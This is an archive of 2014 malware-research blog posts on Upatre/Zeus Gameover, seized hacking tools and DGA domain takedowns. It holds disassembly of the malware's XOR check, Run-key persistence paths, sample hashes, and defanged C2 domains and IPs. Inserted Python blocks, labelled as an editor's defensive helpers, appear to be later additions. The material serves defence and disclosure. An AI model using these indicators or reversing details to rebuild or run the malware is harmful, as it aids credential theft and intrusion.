Wednesday, April 9, 2014

When hackers got hacked - A disclosure & share of evil tools

The Background

With the thankfully good effort of our credited brothers, we, MalwareMustDie, NPO (read: Malware Research Group & Anti Cyber Crime Workgroup), herewith disclose the existence of an evil service that contains the full code of malicious tools, in detail: exploitation tools to distribute malware, hack tools, bruting tools, shell exploitation tools, spam bot tools, malware crypters, malware binary protectors and binary packers, password cracking tools and their wordlists, some hacking and infection tool manuals and blackhat how-to pictures and texts, mostly shared by the known hack group ANTICHAT.RU. The data or contents themselves vary from 2011 and 2012 (mostly), with some new tools or manuals made in 2013.

What service?

The domain name that owns and contains these data is (REDACTED).XAKEP(.)BIZ (see the pictures snapped for the PoC), and the name explains more than words to all of us. For our law enforcement friends: you will be sent an email from our side containing the case's cyber crime investigation evidence, which leads to the suspect ID of the site's owner. Note that the real domain name is a bit different (on purpose); it is covered for law enforcement work purposes.

Please note: your direct access to the site is monitored by the related crook, and there ARE accidents reported after accessing the site. That's why I announced the warning below:

The Shares

For security purposes, the further data will be shown mostly via pictures and video in the following sections. We packed everything that we could fetch into a tarball, as per the snapshot in the picture below. This tarball is shared within a very closed security industry circle ONLY, via our colleague's mailing list (please make sure you join the mailing list; I am sure you know what I mean if you follow our previous disclosures). So if you are a researcher in the AntiVirus, Malware Filter, or Web/Proxy Attack Filtration (+IDS/IPS) industry/entity and want to have the sample but have not received it yet, you can send a request by writing a comment below this post (it will not be published; explaining yourself and using a legit/non-free entity's email address will make the vetting process faster) and your request will be followed up properly. The same goes for Government Security Agencies' and Law Enforcement Agencies' researchers.

The reason we are limiting the shares is not to be "picky" about whom to share the materials with, as we always do with malware samples; we just want to do responsible and right sharing. This case is sensitive on two points. (1) There is an active investigation on this case. (2) These are not malware samples to be shared for learning to crack/reverse/analyze; these are the real malware source codes, malicious tools and account hacking tools, in ready-to-use form, in short: the real stealer tools! These tools are against the law and order in many countries; even just owning them can get you jailed in my country. Some of these tools are still actively spotted in the crime operation scene on the internet. Which means: IF these tools leak or go into irresponsible hands, they can be used for VERY VERY BAD purposes, and MalwareMustDie doesn't hold any responsibility or risk for it.
In some countries where we actually live, it is forbidden to pass around these kinds of tools without strict permission, and only to the appointed limited entities. So we are sorry for the bummer to our researcher friends; we do want to share everything, but in this case we have to do it right. If you are eager to have these materials, please kindly contact a security entity you know and have them contact us for you, then we can discuss the legit possibility for the purpose.
Why did we post here and announce "the sharing" then? Because in reality there are many legit security entities which haven't seen these materials that are actually being used by cyber crime members, and this knowledge and awareness is a must-share (to entities and to the user level). We are trying to do that right here, with responsibility. So we assure you: we vet the contacts, we monitor the download log strictly to make sure no unnoticed party gets access, we don't share with unknown persons, and we deal with legit entities to share at this level with the widest reachable target in the security community.

We are sorry if our sharing scheme is not satisfactory for some security researcher friends. For them, feel free to send us a comment below this post explaining your real identification, and I assure you that you will be assisted.
Thank you.

The Tarball:

Full Directory Structure

Note: newly released directories were wrapped in an additional package; if you don't get it, contact us.

The Pictures & Video of the Evil Contents

Various Exploit Kit's installer packages:

Web Shell in various scripts with or w/o CGI, below is PHP ones only:

Various tools of DDoS, Spammer & Bruter/Bombers:

Various Hack and Infection tools:

Various Malware Binary packers

Various Malware Binary Crypters and Protectors


Account hacking tools

DDoS/Blackhole Decoded

Botnet Installers & Source Codes

Common Proxy Tools used by Malware Crooks

And believe us, there are MANY MORE of those malicious tools than these pictures can show. The video (below), which we recorded after collecting all of the content's data right before archiving, will show more details:


This information is shared as part of the effort to suppress cyber crime activities on the internet. We do not keep or own the malicious contents found; as experts we confirmed the information's credibility, and as good citizens we follow up with the sharing effort accordingly. Using this very precious information, the filtration scheme can be applied better in security and filtration products to protect innocent people from being abused by these malicious tools' users.

MalwareMustDie is working closely with and supporting law enforcement agencies for deeper investigation of the mentioned threats. And we are against any act that makes our beloved internet become a junk place for malware, exploitation, extortion and stealing, a playground for cyber crime crooks.

We will continue to share important findings like this. Please support us.

Credit: Mr. Adam Ziaja of ComCERT, Poland.
Additional Credit: Mr. Mohab Ali of Synapse-Labs.
All materials checked and tarballed by @unixfreaxjp "as per it is" to support cyber crime investigation.

Stay safe always, friends. We have an uncivilized "jungle" claimed name of "internet" out there.


Thursday, April 3, 2014

Daily analysis note: "Upatre" is back to SSL?

Following the previous blog post (link) about Zeus P2P Gameover (GMO) malware delivered by the Upatre trojan downloader in an encrypted form with varied file extension names, today I found that the threat returned to the previous model of the Upatre downloader scheme (via SSL). Just in case, I post it here; it is not new stuff, but I hope it can help some friends:

The spam sample is like this:

*) The attached executable samples can be viewed at the bottom of this post.

The Upatre binary analysis

Some notes on the attached archived PE:

Compile Time: "0x533C67DB [Wed Apr 02 19:41:15 2014 UTC]"
Identified compiler : "Microsoft Visual C++ 5.0/6.0"
Entry Point at section: ".text"
CRC Fail: "Claimed 90984, Actual 77672"
Sigs: "Verified:Unsigned, Publisher: n/a"
Bad Entropy: ".text
              Entropy: 6.336388 (Min=0.0, Max=8.0)
              MD5: 28f4e63b3406fb9343aaf369f1897fb0"
I also used our beloved PeStudio (downloaded from (link)) for a reliable alert check:

Some suspicious/blacklisted calls used:

" GetStartupInfoW   .rdata: 0x000035D8,kernel32.dll
  GetModuleHandleW  .rdata: 0x000035C4,kernel32.dll
  _controlfp        .rdata: 0x000035B6,msvcrt.dll"

// Note about MSVCRT.DLL
MSVCRT.DLL is the Microsoft Visual C Run-Time Library (and MSVCPP.DLL is the standard C++ library) for Visual C++ version 4.2 to 6.0. It provides programs compiled with these versions of Visual C++ a typical set of library functions required by C and C++ programs. These include string manipulation, memory allocation, C-style input/output calls, etc. The msvcrt.dll is now a "known DLL," meaning that it is a system component owned and built by Windows. It is intended for future use only by system-level components.
So.. combined with the "internal calls" of the system used below, this "software" is likely never good..
"_wcmdln         .rdata: 0x0000351A,msvcrt.dll
__wgetmainargs   .rdata: 0x00003524,msvcrt.dll
_initterm        .rdata: 0x00003536,msvcrt.dll
__setusermatherr .rdata: 0x00003542,msvcrt.dll
_adjust_fdiv     .rdata: 0x00003556,msvcrt.dll
__p__commode     .rdata: 0x00003566,msvcrt.dll
__set_app_type   .rdata: 0x00003584,msvcrt.dll
_except_handler3 .rdata: 0x00003596,msvcrt.dll
_XcptFilter      .rdata: 0x00003504,msvcrt.dll
__p__fmode       .rdata: 0x00003576,msvcrt.dll" 
...But then, some known software made with Microsoft Visual C also has traces of them, hmm.. I'll stick with "suspicious" then:

The Upatre binary contains encrypted (or obfuscated?) data in here:

.text:00401870   dd 498D10h, 0F1708305h, 0FF8B04h, 0AC7FF60h, 8D0004E8h
.text:00401870   dd 45C150CCh, 8BFFFF8Dh, 0F811082h, 4242483h, 6F006300h
.text:00401870   dd 8B01E8FFh, 40420D4h, 8D00248Bh, 0F8107D83h, 3300E8FFh
.text:00401870   dd 0F8037E01h, 48B24E8h, 2025A09h, 8B018D8Dh, 412C00h
.text:00401870   dd 0FFFF33FFh, 0DC188261h, 12401FFh, 0A00C0408h, 8BFF0104h
.text:00401870   dd 700C150Dh, 1FF2400h, 0F4F022DBh, 8B000133h, 0E17300E1h
.text:00401870   dd 2 dup(1F001Fh), 0FF00001Fh, 324B32h, 13E08D00h, 0FF1F001Fh
.text:00401870   dd 2 dup(1F001Fh), 0
.text:00401C54   dd 68014816h, 3 dup(1F001F00h), 0FF1F001Fh, 0F06492h, 2 dup(1F001Fh)
.text:00401C54   dd 0FF001Fh, 1F1FFF00h, 4026F155h, 2 dup(1F001F00h), 0A201A241h
.text:00401C54   dd 1F001Fh, 6E614865h, 1F00FF00h, 1FFFh, 2 dup(1F001F00h)
.text:00401C54   dd 0E815701h, 1C001014h, 4081804h, 100008h, 18080404h
.text:00401C54   dd 0C900F8h, 0D400EAh, 0ED00E0h, 0D000C9h, 0AA0095h, 890076h
.text:00401C54   dd 6C0093h, 83007Ch, 8F0070h, 0D100EEh, 94002Bh, 0C600F9h
.text:00401C54   dd 60079h
.text:0040229C   db 0C0h, 0  // closing chunk.
Note: I tend to call it encrypted since it needs a XOR key to decrypt it; see the following notes. Note: there is some more obfuscated data in other places too (in .data, .rdata, and .rsrc); this binary is literally encrypted.

If we solve the above obfuscation (which I cannot), it should give the code for the method that decrypts the encrypted traffic and downloads malware from the assigned hosts. If you don't have a disassembler, you can use the raw disassembler result from the IDA free version that I pasted here--> (link) to start the reversing process.

Another note: the "start" entry point is in the .text section; it checks the environment there (plus a few evasion tricks) and goes to wWinMain, which contains the real deal of decrypting the obfuscated data. In wWinMain I can see the interesting checking pattern below, after the XOR:

"deobfuscation pattern, repeated more than once..
 (three times actually, with different registers used)"
push    edi
pop     edx
mov     eax, [ebp+var_60]
rol     eax, 6
add     eax, 455E4A5h
mov     [ebp+var_3C], eax
mov     edx, 136C6E9Bh
mov     [ebp+var_1C], edx
mov     ecx, 7E0C0B9Ah
mov     [ebp+var_68], ecx
mov     eax, 668758F1h
mov     [ebp+var_14], eax
mov     edx, 5D1E4FCDh
mov     [ebp+var_18], edx
mov     ecx, 0FFFFFFFFh
mov     [ebp+var_C], ecx
call    sub_4015A0  [...]    <=== "xor'ed and checked"

"called checks to sub_4015A0: "
push    ebx
push    esi
push    edi
mov     ebx, [ebp-80h]
xor     ebx, 0ABED8791h  <======
mov     edx, 40000000h
ror     edx, 0Eh
cmp     ebx, edx   // the checks.
jb      sub_401464 // end stuff here...
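As an added example (the editor's own analysis helper, not code from the post or from the Upatre sample), the constant-folded comparison in sub_4015A0 can be evaluated statically: `ror edx, 0Eh` on 40000000h leaves 10000h in edx, so the `jb` is taken exactly when the XOR-decoded dword is below 10000h, i.e. when the high 16 bits of [ebp-80h] equal the high 16 bits of the key ABED8791h. The `rol eax, 6 / add eax, 455E4A5h` step from the wWinMain pattern is emulated the same way. The register names, offsets and constants are those of the listing above; what the decoded value means is not assumed.

```python
"""Static evaluation of the constant-folded checks shown in the post's
Upatre listing (editor's example, not the sample's or the post's code)."""

MASK32 = 0xFFFFFFFF

def rol32(x, n):
    """32-bit rotate left, as the x86 `rol` instruction does it."""
    n &= 31
    return ((x << n) | (x >> (32 - n))) & MASK32

def ror32(x, n):
    """32-bit rotate right, as the x86 `ror` instruction does it."""
    n &= 31
    return ((x >> n) | (x << (32 - n))) & MASK32

# Constants copied from the listing in the post.
XOR_KEY = 0xABED8791                 # xor ebx, 0ABED8791h
THRESHOLD = ror32(0x40000000, 0x0E)  # mov edx, 40000000h ; ror edx, 0Eh

def folded_threshold():
    """The value edx holds at `cmp ebx, edx`: ror(0x40000000, 14) == 0x10000."""
    return THRESHOLD

def passes_check(var_80):
    """Emulates `mov ebx,[ebp-80h] ; xor ebx,KEY ; cmp ebx,edx ; jb`.
    Returns True when the jump is taken (unsigned compare, as jb implies)."""
    return ((var_80 ^ XOR_KEY) & MASK32) < THRESHOLD

def branch_taken_range():
    """Closed range of raw dwords for which jb is taken: the XOR result is
    below 0x10000 iff the raw value's high 16 bits equal the key's."""
    low = XOR_KEY & 0xFFFF0000
    return (low, low | 0xFFFF)

def var_3c_from(var_60):
    """Emulates `mov eax,[ebp+var_60] ; rol eax,6 ; add eax,455E4A5h`
    from the wWinMain pattern and returns what lands in [ebp+var_3C]."""
    return (rol32(var_60, 6) + 0x0455E4A5) & MASK32

if __name__ == "__main__":
    print("edx at the cmp: 0x%08X" % folded_threshold())
    lo, hi = branch_taken_range()
    print("jb taken for raw values 0x%08X..0x%08X" % (lo, hi))
    print("var_3C for var_60=0: 0x%08X" % var_3c_from(0))
```

Folding the rotate this way is what an analyst does before deciding whether a check is an environment test or a key validation: here the comparison only depends on the upper half of the XOR key, which is a useful thing to know before stepping through it in a debugger.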

How does it work?

This is what I saw. During execution, the Upatre is communicating with the host below:

kionic,com / 64,92,125,121 (Netfronts/U.S.A.)

via TLSv1 (SSL):

which fetches the Microsoft certificate patch's URL and Comodo's encryption certificate's URL:

Next, these data will trigger each URL in the list to be downloaded by the Upatre itself, as shown below:

Some reference for you explaining what was downloaded from the Microsoft site:

It is a patch to revoke certificates, intended to make sure the following Comodo certificate can be installed successfully:

This is the one that can be downloaded successfully:

Next.. Upatre downloads a binary blob via an encrypted communication (SSL) from (

To be more viewable:

The downloaded malware is saved and registered (autorun) in:

// drops:
C:\Documents and Settings\%USER%\Local Settings\Temp\Ixtya (RANDOM)
2004/08/08  12:58  646,656 dyzucy.exe (random) 0929a17a3fbaf6b1eb63ab8d5edbdd45

// registry..
Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Data: "dyzucy.exe" (RANDOM), Values: "C:\Documents and Settings\kaspersky\Local Settings\Temp\Ixtya (RANDOM)\dyzucy.exe(RANDOM)"
It is Zeus P2P Gameover (GMO), the rootkit version. Upatre executes this GMO and then deletes itself. Clean cut.
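As an added defender-side check (the editor's own example, not code from the post or the malware), the persistence pattern shown above, an autorun value under HKCU\...\Run pointing into Local Settings\Temp, is easy to triage from a `reg query` style dump. The dump below is constructed: the Zeus entry reuses the path and value name from the post, and the other two lines are made-up benign entries for contrast.

```python
"""Triage of HKCU Run-key values whose target lives in a temp directory
(editor's example; the dump is constructed, not taken from a real host)."""
import re

# Constructed dump in the layout `reg query HKCU\...\Run` prints.
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    dyzucy.exe    REG_SZ    C:\Documents and Settings\kaspersky\Local Settings\Temp\Ixtya\dyzucy.exe
    OneDrive      REG_SZ    "C:\Users\kaspersky\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Path fragments (lower-cased) that mark a temp directory on XP-era and
# modern Windows; an autorun living there is worth a closer look.
TEMP_MARKERS = (
    "\\local settings\\temp\\",
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "%temp%\\",
    "%tmp%\\",
)

# One value line: <indent><name> <REG_type> <data>
LINE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")

def parse_run_key(dump):
    """Return a list of (value_name, reg_type, data) tuples from the dump."""
    entries = []
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"]))
    return entries

def executable_path(data):
    """Strip surrounding quotes and trailing arguments to get the program path."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    # Unquoted command line: the path ends at the first ".exe" followed by
    # whitespace or end of string (paths with spaces are common on XP).
    m = re.match(r"(.+?\.exe)(\s|$)", data, re.IGNORECASE)
    return m.group(1) if m else data.split()[0]

def runs_from_temp(path):
    """True when the path points into a temp directory (case-insensitive)."""
    lowered = path.lower()
    return any(marker in lowered for marker in TEMP_MARKERS)

def suspicious_autoruns(dump=RUN_KEY_DUMP):
    """Value names whose executable lives in a temp directory."""
    return [name for name, _type, data in parse_run_key(dump)
            if runs_from_temp(executable_path(data))]

if __name__ == "__main__":
    for name in suspicious_autoruns():
        print("suspicious autorun value:", name)
```

The same marker list works on the output of `reg export` or on a forensic hive dump once the lines are brought into this shape; the point is the path check, not the parser.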

The spawned malicious processes look like this:

Invoice_040314.scr (PID: 3860 MD5: C941E2997DC2A1E39515D226E1830DB4)
    tech3.exe (PID: 1192 MD5: 984A0B8A58EA60B3376CE25692B68FA8)
        tech3i.exe (PID: 3672 MD5: 5038C8E8D2B9A00327D0CBF334223E9D)
            dyzucy.exe (PID: 1404 MD5: C7BD551912375FA2312629E070AC51F2)
                1aaa970c.sys (PID: 4 MD5: BA2B9FFB336BF5AF0247313FE2509435)
            cmd.exe (PID: 4076 cmdline: C:\Windows\system32\cmd.exe /c %Temp%\XNY9C82.bat MD5: AD7B9C14083B52BC532FBA5948342B98)

The Gameover

Not much to tell (kudos to the good people who fight this threat well!); instead it is the usual installation (the batch): it drops its rootkit and hooks itself in the registry, and after a while it starts querying some DGA as below:

aulbbiwslxpvvphxnjij,biz                                      /
behatwdxzxelembmfahkw,biz                                     /
..and as usual it sends a POST /write HTTP/1.1 (I won't go into details on these, cheers!):

Are they really changed?

Samples, Traffic and VT

Below are the sample's snapshots:

Please download via Kernel Mode-->(link)

Matrix of infection stages' detection ratio (VT)

This time I would like to make a matrix of the detection ratio of the malware at the time I analyzed this sample. I used the VirusTotal (VT) scores for a comprehensive result. Please note that the VT score is based on the signature part of detection (not the overall filtration) used by the AntiVirus industry, so it is not an exact measurement, but it is good enough to give an idea of how the AV industry detects this threat in every form of sample (during the infection stages) of this infection.

The "Stage" column explains the form of the malware during the infection process as the object scanned by AV products. I started from stage 1 as the email data itself, then the attachment in zip, the PE, the PE self-copied after being clicked, the downloaded GMO, the self-copied GMO, and the rootkit downloaded/used. Feel free to comment for improvement:

Stage  Malware                               VirusTotal score
1      EML spam file                         15/51
2      Upatre SCR in attached zip            21/51
3      Upatre fake SCR, the PE file          20/51
4      Upatre self-copied after clicked      14/51
5      Downloaded Zeus GMO                   17/51
6      Self-copy of Zeus GMO after download  13/51
7      Rootkit (Necurs)                      15/51

So overall we have an average score of 16.42/51, or a 32.21% detection ratio, for this malvertisement; not so bad :-)

Video Analysis Tips and Guide

I made and uploaded an HD video as a quick howto for analyzing this threat (Upatre/GameOver sets), as seen below. I used a different set of samples, and it does not describe the specific sample mentioned in this or the previous post, but it is the same threat and case:

Stay safe friends. #MalwareMustDie!

Saturday, March 22, 2014

A post to sting Zeus P2P/Gameover crooks :))

The Background

This end of the week, Zeus P2P Gameover (in short: GMO) is having a large campaign by utilizing Upatre (using the latest version to download an encrypted ZZP file with many extensions) riding on the Cutwail spambots (I checked those by IP and templates). As so many good writings and coverage out there have stated, this recent GMO has a new trend of using the Necurs rootkit, sending a new callback (with POST /write) HTTP header to the CNC, dropping themselves (GMO payloads) with polymorphic hashes to evade detection, plus tons of randomized DGA to fire P2P callbacks for the botnet functionality (the last one is apparently not new).

Shortly, this new "trend" with the large volume of the campaign caught my interest, so I started to collect what came to my honeypot from March 18, 2014 until today as the background of this post.

The Quick Research

Below are the pictures of the malvertisement that the crook kindly sent me personally:

And below is the list of analyses I did in VirusTotal; see the comment of each post for the details:
d866214d1f921028f9001ae399e9f8dec32ec8998c84d20d60a992164888a6fc
37a835b0ac6d9727bf881743a90e3a8684ca53fdf485645ce07617ec1a203067
947470a114311049e707dfefce904fa727c8170eae8c46165730c699e7636b5f
4514fc971127fb0a38a7eb6ce45ce44a68b1b3298ff98d5dd6e4f9bd2af0b1ac
abf2a63b0b02979d79edd4563f784c7c375eb0cb3ef4dc12ccba2612d07a9dc2
e49c5883dfe16916a262f54013735d20fec64ecaf5d6f598c4493f4f68fb9199
e5270d906ef13a91e176cf60473747e5bf91bc60fe457dd0f3201a5f51cf6524
5593370060e811aeacbb09161b9d8ebbf4251286f821503dbede0993f248d13c
a7739611b998ed82e060d4297d38f8f0792f4866c54575ba5ba6f2b454246f07
e85446688c08dd62bb17a21255fe486eb2fb8ca4acc2e4ae974e31a4ad9dfbe0

There are many interesting details about this threat, like VRT (link) and CERT Polska (link), which are very good reports! Since I am dead busy right now, please kindly bear with this short post; I won't write much of the technical details already covered in previous reports by others. SO what I want to stress here is only one aspect: the DGA callback domains used by GMO (as per the picture below), which weren't covered much in previous articles but are important to understand and learn, since the DGA used by GMO has weak points that can be used to stop or mitigate the threat, giving the bad actors behind the scene a "sting" :))

What's with these "Lame" DGA?

Skipping the details of reversing the binaries for security purposes, and comparing the results in the forensics, I collected these callbacks as per the list of domains below:


"// Additional:"

"// Additional:"

"// Additional:"

"// Additional:"
These are the "Lame DGA" that GMO uses, meaning these are strings that are decoded in the malware binary without seeds, a wannabe DGA (Domain Generation Algorithm) which is not randomized; the logic for extracting each string is in the GMO binary itself for the listed samples I stated above. One doesn't have to be a reverser to figure out that some of these "Lame DGA" domains are used and spotted over and over in many samples. So why were so many domains made, and why do they "look" randomized in name? "Maybe" they (the GMO crooks) want us to think it is a DGA, to avoid blocking actually. It is an insult to decent people's intelligence and will be a massive big #FAIL for the crooks themselves if people start to aim the cannon at this weak spot (yes, friends, aim your cannon there, THERE!).

What? Blocking? Is it blockable? Not a decoy or something? Are these really activated? < The answer to all of these is generally "YES!", and it could be a decoy too (if they're not going to activate these domains anyway). Great, isn't it? :D

Activation, IP Information & Getting Closer to CNC??

As the PoC: now (TODAY, to be precise) I found that four of the domains above are actually activated and ALIVE:

aulbbiwslxpvvphxnjij,biz,           "50,116,4,71     DNS1-5,REGISTRAR-SERVERS,COM"
peucehqxsgmzhgujfsoeihmpvhiz,info,  "212,71,235,232  NS1-4, MONIKERDNS,NET"
tcvkwsbqnjhjobgyttklnfxo,com,       "23,239,140,156  NS1-4,MONIKERDNS,NET"
zxjzaypibnjayfmpzpalkbaunzl,com,    "178,79,178,243  DNS1-2,NAMESECURE,COM"


With the detailed information below:

Yes, LINODE has a serious matter with Zeus/Gameover, because all of these IP addresses are GMO's command and control front ends :-))

These 4 (four) and one newly added (will add more) IP addresses are also not ISDN/pool IPs but static IPs, and two of them are in the status of corporate ones. So if you think that these four IPs are peer-to-peer or infected PCs' IPs, the answer is no; please start to deduce the further investigation steps on why GMO is collaborating with these IPs.

ADDED: Cut the crap! What's the connection of the DGA to CNC??

I was asked many questions about what this DGA actually does. I will try to write a simple explanation as follows; sorry to my fellow researchers for burping this fact out here, because "some people" are starting to think that I am trying to sell a "candy bar" here..

Gameover rapidly requests DNS for the active IP address of the CNC by using this DGA, "WITH OR WITHOUT internet connection" (since I heard some noise saying to cut the internet connection to make GMO query lots of domains.. which is just WRONG).
Even if the internet connection exists, GMO will make the rapid requests as per the PCAP screenshot above (see below for the re-post).

The purpose is to confuse researchers; they are aiming at only one (or max: two) IP address(es) of the CNC that are actually registered under a "few" of the "tons" of lame DGA domains. To be clearer, take a look at the PoC below:

As the PoC, looking at the latest sample's DGA, we detected the activation of the IP address below:

Receiving the IP address from the DGA request, GMO can then send its request to the CNC, as per the real PoC below:

This is the connection, and this is how the DGA is actually very important for Gameover's communication with the CNC: blocking these DGA domains will block its communication to the CNC, and without the CNC connection GameOver is just "another" botnet without a master's command and control, working peer to peer with each other without any control from the herder < this is the connection you all asked for; this is the attack point. (Forgive me, God of InfoSec, for burping this info out in public here; there is no way I can convince others without telling this fact loud and clear..)
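As an added example serving both the domain/IP table above and the "few IPs behind tons of domains" explanation just given (the editor's own Python, not the post's or Gameover's code): it refangs the comma-defanged notation the post uses, flags labels that look machine-generated with a cheap vowel-ratio heuristic, and groups the live domains by the IP and nameserver they share, which is the blocking and investigation point the post argues for. The four live rows are copied from the post's table; the two .example rows on an RFC 5737 address and the NXDOMAIN row are constructed to show the IP-sharing and not-yet-active cases.

```python
"""Refang, sort and cluster the post's 'lame DGA' domains by shared
infrastructure (editor's example; the .example rows are constructed)."""
import ipaddress
from collections import defaultdict

# Rows in the post's comma-defanged style: domain, resolved IP, nameserver.
# First four rows copied from the post; last three constructed.
DEFANGED_TABLE = """
aulbbiwslxpvvphxnjij,biz            50,116,4,71     DNS1-5,REGISTRAR-SERVERS,COM
peucehqxsgmzhgujfsoeihmpvhiz,info   212,71,235,232  NS1-4,MONIKERDNS,NET
tcvkwsbqnjhjobgyttklnfxo,com        23,239,140,156  NS1-4,MONIKERDNS,NET
zxjzaypibnjayfmpzpalkbaunzl,com     178,79,178,243  DNS1-2,NAMESECURE,COM
qwtkzmxnbvplrtwqzx,example          192,0,2,10      NS1-2,CONSTRUCTED,EXAMPLE
zmxkqpwtrbnvcxzlkjhg,example        192,0,2,10      NS1-2,CONSTRUCTED,EXAMPLE
behatwdxzxelembmfahkw,biz           NXDOMAIN        -
"""

VOWELS = set("aeiou")

def refang(token):
    """The post writes 'a,b' for 'a.b' so nothing auto-links; undo that."""
    return token.replace(",", ".").lower()

def parse_table(text=DEFANGED_TABLE):
    """Return [(domain, ip_or_None, nameserver_or_None), ...] per non-empty row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        domain, ip, ns = (refang(p) for p in parts)
        try:
            ip = str(ipaddress.ip_address(ip))
        except ValueError:          # e.g. 'nxdomain': the name did not resolve
            ip = None
        rows.append((domain, ip, None if ns == "-" else ns))
    return rows

def looks_generated(label):
    """Cheap heuristic for 'lame DGA' labels: long and either vowel-poor or
    carrying a long consonant run. Good enough to sort a list, not a verdict."""
    letters = [c for c in label if c.isalpha()]
    if len(letters) < 12:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio < 0.3 or longest >= 5

def generated_domains(rows=None):
    """Domains whose first label trips the heuristic (live or not: the post
    expects the unregistered ones to be registered later)."""
    rows = parse_table() if rows is None else rows
    return [d for d, _ip, _ns in rows if looks_generated(d.split(".")[0])]

def live_by_ip(rows=None):
    """Map each resolved IP to the sorted domains pointing at it."""
    rows = parse_table() if rows is None else rows
    groups = defaultdict(list)
    for domain, ip, _ns in rows:
        if ip:
            groups[ip].append(domain)
    return {ip: sorted(ds) for ip, ds in groups.items()}

def live_by_nameserver(rows=None):
    """Map each nameserver to the sorted live domains delegated to it."""
    rows = parse_table() if rows is None else rows
    groups = defaultdict(list)
    for domain, ip, ns in rows:
        if ip and ns:
            groups[ns].append(domain)
    return {ns: sorted(ds) for ns, ds in groups.items()}

def shared_ips(rows=None):
    """IPs fronting more than one DGA domain: the 'one or two CNC addresses
    behind tons of domains' pattern, and the first thing to hand to abuse desks."""
    return sorted(ip for ip, ds in live_by_ip(rows).items() if len(ds) > 1)

if __name__ == "__main__":
    for ip, domains in live_by_ip().items():
        print(ip, "<-", ", ".join(domains))
    print("shared:", shared_ips())
    print("not yet active:", [d for d, ip, _ in parse_table() if ip is None])
```

Grouping by nameserver as well as by IP matters for the registrar route the post recommends: domains sharing a delegation were very likely registered through the same account, which is what the "get the registration info" point below relies on.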

What's the point??

Below are my points, I make it as simple as possible:

1. Get these DGA domains' registration info! These DGA domains are registered only by the bad actor; they are not hacked sites, not hacked domains. We have tons of experience now in nailing crooks' IDs by this method, so please extract the information from your known registrars and pass it to law enforcement immediately.

2. A suggestion: a chance to catch them "in the act". The unregistered domains will likely be registered sooner or later after the current ones are blocked/suspended, so it is good for registrars, CERTs and law enforcement to make an extra effort: a list, or better yet, an auto-block scheme and maybe a direct alert system sent to law enforcement, to trap the crook's collaborating channels so they can be "caught in the act" and legally investigated.

3. Do it NOW. The GMO coders implemented the logic of the DGA in the GMO binary, which is not easily remade without redeveloping a big part of the current malware, so we can hope this scheme lasts for a while; it is a chance for the good guys! :-))

4. Words for the "malware crooks": I would really love to see the malware "crooks'" faces while they're reading this post :P) A few words for the malware coders from us: we are security engineers here, we reverse stuff very well, we investigate things deeply, don't make us come at you now; STOP your malware coding practice and get decent work like all of us. Life, no matter what, is never easy; let's code something useful and positive, even if we only receive a few pennies for it.


Additional & Follow up

Mr. Conrad Longmore extracted more related DGA domains via the verdicted IP addresses above; thanks Conrad, so we don't have to crack binary per binary to get these. Please visit the Dynamoo Blog at the link below:


What we are posting here is knowledge for the awareness of many PC users, the victims who are getting many hits from this malware's infection and whose credentials were stolen into some botnet panels by these GMO-affiliated gates/panels, to inform you that there are actually many methodologies that can be applied and executed to stop malware infection schemes coming from/using the internet. As long as the good guys are still in control of the networking and the internet, the scheme to stop malware infection via malvertisement can always be applied.
The only problem is always: HOW BADLY do we REALLY want to stop this malware?


Monday, February 24, 2014

Tango Down: The takedown of 209,306 .IN.NET Nuclear Pack DGA domains

This post is a tribute to the hard-working individuals and professionals who made the impossible happen.

The Report

As one result of a persistent collaboration between security researchers and the domain registration process, following the previous suspension effort of Nuclear Pack Exploit Kit domains (link), on behalf of the individuals and professionals involved in the process we dare to announce the suspension of 209,306 Nuclear Pack domains on the TLD ".IN.NET". It is the biggest Tango Down score in the history of MalwareMustDie.

For security purposes we cannot say much detail about this matter yet, except that all of the domains are positively "verdicted" for their involvement in the DGA scheme of the malicious infection toolkit, and were positively confirmed beforehand against the suspicious facts from their preliminary registration investigation. The bad actor(s) prepared these domains to serve malware; the usage of these domains is blocked, and the currently spotted active domains are all suspended.

We announce the tango news here to signal law enforcement and the authorities to start investigating the listed suspended domains, which contain data that can be used as cyber crime evidence of the malware infection effort through software exploitation by abusing mass .IN.NET internet domains.

The full list of the DGA domains used and the checking report is very long, so we cannot paste them all here in the post or in pastes (yet), but this is the link to the extracted DGA domains -->[here] < Thank you @jedisct1 and Gist!

Good Work Credit

Special thanks for the great cooperation from the DOMAINS.IN.NET Team, what speedy and solid work! It is a very long list, but you checked it instantly, followed by the swift suspension.
Special credit goes to our friend Mr. Frank Denis of OpenDNS for the DGA decoding and its report, our Tango Department led by Mr. Sachin Raste of eScan, side by side with Mr. Conrad Longmore, Mr. Dhia Mahjoub of OpenDNS and other managers from various entities whom we cannot all mention here, who are actually silently fighting this threat in a tough daily routine, Salud!

The process is not stopping here. There will be more follow-up.

Tweets & Comments


Sunday, February 23, 2014

How public services like Amazon AWS, DropBox, Google Project/Code & Google ShortURL got abused for malware infection

Today I was almost going to bed when I bumped into this threat. Please kindly bear with the sleepy eyes writing this. I am combining screenshots and log/details in text; hopefully no filtration product will block this post for a bit of URL pasting.

This write-up contains many points that are important information for fellow friends and the mentioned public services, to be aware of being abused by this malware infection session. So I wrote this as fast as possible, leaving the payload binary analysis and exploit analysis for a rain check. Anyone who can help contact the related abuse desks is very highly appreciated.

Infection Source:

First of all, the source of infection is the malware infection code/scripts implemented on the IP and domain below, located in the OVH network in France; I really hope for help from French friends to clean this IP of any installed malware infector toolkits:

Secondly, the infector starts from a Japanese IP under the domain: shortening .biz

This needs to be cleaned up too, yet I think more infectors exist..

The background

It started when I checked a suspicious URL, accessing it in the browser as per below:

